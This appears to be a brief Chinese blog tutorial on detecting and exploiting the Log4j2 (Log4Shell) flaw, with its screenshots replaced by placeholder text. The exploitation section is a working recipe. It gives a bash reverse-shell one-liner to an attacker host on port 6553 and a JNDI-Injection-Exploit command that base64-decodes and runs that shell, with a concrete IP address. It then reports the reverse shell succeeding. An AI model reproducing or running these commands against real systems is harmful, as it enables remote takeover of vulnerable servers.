log4j2漏洞检测和利用

1.漏洞检测

漏洞检测使用的是BP插件,插件地址
在这里插入图片描述

2.利用

JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下:
将以下命令进行base64编码,IP替换为你攻击机IP。

bash -i >& /dev/tcp/x.x.x.x/6553 0>&1

在这里插入图片描述
使用工具命令如下:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,base64编码}|{base64,-d}|{bash,-i}" -A 120.77.202.2

在这里插入图片描述
burp发包:
在这里插入图片描述
反弹shell成功:
在这里插入图片描述